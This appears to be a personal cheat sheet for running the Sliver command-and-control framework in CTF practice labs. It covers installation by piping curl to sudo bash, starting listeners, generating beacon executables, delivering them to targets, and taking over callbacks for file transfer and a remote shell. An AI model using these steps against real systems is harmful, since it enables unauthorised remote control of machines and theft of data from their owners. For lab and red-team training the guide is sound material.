Quick Reference Guide: Bishop Fox’s Sliver C2
Introduction
I’m looking to incorporate more and different tools into my weekly Hack the Box/Proving Grounds practice runs. Recently, I was re-introduced to the Bishop Fox C2 project, called Sliver for the first time in a while, and I’ve really enjoyed getting to know it a little. I’m aiming to use this page as a bit of a quick reference guide for myself and hope to edit it as I discover more useful tricks.
NOTE: this is intended for my use in CTFs/practicing, and is not production or otherwise professionally put together.
Related informative sources
https://notateamserver.xyz/sliver-101/
https://heartburn.dev/hack-the-box-walkthrough-anubis-using-sliverc2/
Installation
In Kali, it really was just as simple as running their one-liner:
curl https://sliver.sh/install|sudo bashStartup
└─$ sliver
Connecting to localhost:31337 ...
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain evolve
[*] Server v1.5.30 - a8a36dd6e2c9796c51ab6983b5b615d19c6a6995
[*] Welcome to the sliver shell, please type 'help' for optionsInstall the armory
This will install all the third party post exploitation scripts.
sliver > armory install allStart a listener
sliver > https local-ip-address --lhost -DGenerate beacons
This creates an executable that can be launched on the platform of choice.
sliver > generate beacon --http http://local-ip-address --os windows --save local-path-for-executable
Execute beacons
Get the executable file you just created, get it to your target user or host and execute it (or get someone to execute it for you) – you’ll see a call back and a beacon entry show up in the beacons list.
List beacons
sliver > beacons
ID Name Transport Username Operating System Last Check-In Next Check-In
========== ================== =========== ========== ================== =============== ===============
d97fcc0b UGLIEST_FAMILIAR http(s) op1user linux/amd64 1h12m2s 1h10m47s
7fae33ed UGLIEST_FAMILIAR http(s) op1user linux/amd64 43m42s 42m19s
d2355aee UGLIEST_FAMILIAR http(s) op2user linux/amd64 29m59s 28m50s
aedc2bbd UGLIEST_FAMILIAR http(s) op3user linux/amd64 29m44s 28m34s
6f3596af UGLIEST_FAMILIAR http(s) root linux/amd64 38s 36sUse beacons
In order to set the current context to a particular beacon, I use the generated ID from the listing above. The prompt will change to contain the name of the selected beacon one it’s set as your active one. You can now issue commands.
sliver > use 6f3596af
[*] Active beacon UGLIEST_FAMILIAR (6f3596af-187d-4b0c-b264-d7482fc6d80b)
sliver (UGLIEST_FAMILIAR) >Show task list
You can see the status of currently queued and completed tasks issued to a beacon as below:
sliver (UGLIEST_FAMILIAR) > tasks
ID State Message Type Created Sent Completed
========== =========== ============== =============================== =============================== ===============================
49ead4a9 completed Ls Tue, 18 Oct 2022 23:58:08 EDT Tue, 18 Oct 2022 23:58:52 EDT Tue, 18 Oct 2022 23:58:52 EDTRecall task output
You can re-review the output for a task and get more information about it using fetch and the task’s ID number.
sliver (UGLIEST_FAMILIAR) > tasks fetch 49ead4a9
+------------------------------------------------------+
| Beacon Task | 49ead4a9-5859-465f-90e1-1c18ffbcdbdc |
+---------------+--------------------------------------+
| State | ✅ Completed |
| Description | LsReq |
| Created | Tue, 18 Oct 2022 23:58:08 EDT |
| Sent | Tue, 18 Oct 2022 23:58:52 EDT |
| Completed | Tue, 18 Oct 2022 23:58:52 EDT |
| Request Size | 18 B |
| Response Size | 639 B |
+------------------------------------------------------+
/tmp (3 items, 16.1 MiB)
=========================
dtrwxrwxrwx .font-unix <dir> Thu Sep 01 15:33:00 -0400 2022
dtrwxrwxrwx .ICE-unix <dir> Thu Sep 01 15:33:00 -0400 2022
dtrwxrwxrwx .Test-unix <dir> Thu Sep 01 15:33:00 -0400 2022Upload/download a file using beacons
sliver (UGLIEST_FAMILIAR) > upload /path/to/local/file /path/to/remote/destination
[*] Wrote file to /tmp/xxxx.sh
sliver (UGLIEST_FAMILIAR) > download /path/to/remote/source /path/to/local/destination/
[*] Wrote file to /tmp/xxxx.shPrepare interactive session
sliver (UGLIEST_FAMILIAR) > interactive
[*] Using beacon's active C2 endpoint: http://x.x.x.x
[*] Tasked beacon UGLIEST_FAMILIAR (5e13a94a)
[*] Session 13b20a10 UGLIEST_FAMILIAR - x.x.x.x:48738 (op1user) - linux/amd64 - Wed, 19 Oct 2022 00:10:05 EDTList interactive sessions
sliver (UGLIEST_FAMILIAR) > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ====================== ========== ========== ================== =========
13b20a10 http(s) x.x.x.x:48738 op1 op1user linux/amd64 [ALIVE]Switch to interactive sessions
Using the session ID from above, we will use the familiar from meterpreter/metasploit sessions -i. The prompt will change colors to red once this is complete.
sliver (UGLIEST_FAMILIAR) > sessions -i 13b20a10
[*] Active session UGLIEST_FAMILIAR (13b20a10)
sliver (UGLIEST_FAMILIAR) >Switch to full shell
Once in an interactive session, you can drop to a full purpose shell.
sliver (UGLIEST_FAMILIAR) > shell
? This action is bad OPSEC, are you an adult? Yes
[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...
[*] Started remote shell with pid 29576
op1user@op1:/tmp#